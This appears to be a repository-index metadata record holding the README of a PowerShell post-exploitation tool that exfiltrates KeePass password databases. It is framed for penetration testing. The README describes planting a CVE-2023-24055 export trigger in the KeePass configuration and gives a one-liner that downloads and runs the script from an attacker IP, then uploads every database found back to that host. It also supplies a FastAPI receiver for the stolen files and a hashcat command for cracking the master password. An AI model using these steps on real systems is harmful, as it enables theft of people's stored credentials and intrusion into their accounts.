{"id":18704789,"url":"https://github.com/n3rada/invoke-keepassbackup","last_synced_at":"2025-11-09T05:30:26.108Z","repository":{"id":199913895,"uuid":"704073837","full_name":"n3rada/Invoke-KeePassBackup","owner":"n3rada","description":"A PowerShell tool for backing up and exporting KeePass databases to a specified endpoint with GZip compression.","archived":false,"fork":false,"pushed_at":"2023-11-08T16:25:04.000Z","size":28,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-12-28T06:26:20.387Z","etag":null,"topics":["cve-2023-24055","exfiltration","keepass","pentesting-windows","post-exploitation","powershell"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n3rada.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-10-12T13:35:31.000Z","updated_at":"2023-12-28T20:29:52.000Z","dependencies_parsed_at":"2023-10-13T12:31:33.057Z","dependency_job_id":"d04801be-f612-4e82-bb9d-5610587080f7","html_url":"https://github.com/n3rada/Invoke-KeePassBackup","commit_stats":null,"previous_names":["n3rada/invoke-keepassbackup"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FInvoke-KeePassBackup/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n3rada","download_url":"https://codeload.github.com/n3rada/Invoke-KeePassBackup/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239567635,"owners_count":19660519,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2023-24055","exfiltration","keepass","pentesting-windows","post-exploitation","powershell"],"created_at":"2024-11-07T12:08:20.570Z","updated_at":"2025-11-09T05:30:26.074Z","avatar_url":"https://github.com/n3rada.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Invoke-KeePassBackup\nThis PowerShell script has been crafted to streamline the process of transmitting KeePass databases to a designated endpoint. Conceived as an indispensable tool for your penetration testing toolkit, it aims to facilitate the exfiltration of target databases, paving the way for subsequent exploitation. 🕊️\n\nThe goal is to incorporate comprehensive KeePass tests, thereby eliminating manual, time-consuming commands.\n\n## Features\n- Automatically locates the KeePass executable and ascertains its version.\n- Adds an export trigger to the KeePass configuration if KeePass version is below 2.53 (a.k.a [`CVE-2023-24055`](https://nvd.nist.gov/vuln/detail/CVE-2023-24055)).\n- Backs up the current KeePass configuration before making changes.\n- Scours all KeePass databases on the computer and uploads them to a given endpoint.\n- Uses GZip compression for efficient backup size.\n  \n## Usage\nRun the script using the following command:\n```powershell\nInvoke-KeePassBackup -url \"https://backup.endpoint/u\"\n```\n\nKnowing the real use-case, preferred running is from your own `HTTP(S)`/`WebDAV` server:\n```powershell\n$ip=\"192.168.45.218\";powershell -nop -c \"iex(irm http://$ip/Invoke-KeePassBackup.ps1); Invoke-KeePassBackup http://$ip/u\"\n```\nIt will output something like this:\n```powershell\n--------------- KeePass backup for noah@ITWR02\nKeePass location: C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe\nKeePass version: 2.51.1.0\n--------------- Adding an export trigger on config file: C:\\Users\\noah\\AppData\\Roaming\\KeePass\\KeePass.config.xml\nBackup of current config file done at: C:\\Users\\noah\\AppData\\Roaming\\KeePass\\KeePass.config.backup.xml\nExport location: C:\\Users\\noah\\AppData\\Local\\Temp\\KeePassBackup.csv\nConfiguration complete. The trigger will go off as soon as it is opened.\n--------------- Scanning for KeePass databases on ITWR02\nFound KeePass database at: C:\\Users\\noah\\Documents\\Database.kdbx\nUploaded noah@ITWR02-20231012-Database.kdbx successfully!\n```\n\nThe reception point could look like this FastAPI Python3 code snippet:\n```python\n@app.post(\"/u\")\nasync def upload_file(x_file_name: str = Header(...), data: str = Body(...)):\n    \"\"\"\n    Handle file upload via POST request.\n\n    Args:\n        x_file_name (str): The name of the file, from header.\n        data (str): The body of the request containing the uploaded file's data.\n\n    Raises:\n        HTTPException: If the filename header is missing.\n        HTTPException: If an error occurs during file upload.\n    \"\"\"\n\n    if not x_file_name:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Provide a filename with Header 'X-File-Name'\",\n        )\n\n    try:\n        # Decode the base64 data\n        decoded_data = base64.b64decode(data.encode(\"utf-8\"))\n\n        # Check if the data is gzipped by looking at the first two bytes\n        if decoded_data[:2] == b\"\\x1f\\x8b\":\n            # If gzipped, decompress\n            buffer = io.BytesIO(decoded_data)\n            with gzip.GzipFile(fileobj=buffer, mode=\"rb\") as f:\n                processed_data = f.read()\n        else:\n            # If not gzipped, just use the decoded data as is\n            processed_data = decoded_data\n\n        # Save the file\n        save_file_content(file_name=x_file_name, data=processed_data)\n\n        return {\"status\": \"success\", \"message\": f\"Received {x_file_name}.\"}\n\n    except Exception as error:\n        logger.error(f\"Error while processing upload: {error}\")\n        raise HTTPException(status_code=500)\n```\n\nOnce database received, to crack the KeePass database hash, first use `keepass2john` to extract the hash. Then, remove the prepended filename, which acts as a username, and utilize `hashcat` with the desired wordlist and rules.\n```shell\nhashcat $(keepass2john loot/noah@ITWR02-20231012-Database.kdbx | cut -d':' -f2-) -a 0 -O -D 1 -w 3 /usr/share/wordlists/rockyou.txt -m 13400 -r /usr/share/hashcat/rules/rockyou-30000.rule --force\n```\n\n## Contributing\n\nPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Finvoke-keepassbackup","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn3rada%2Finvoke-keepassbackup","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Finvoke-keepassbackup/lists"}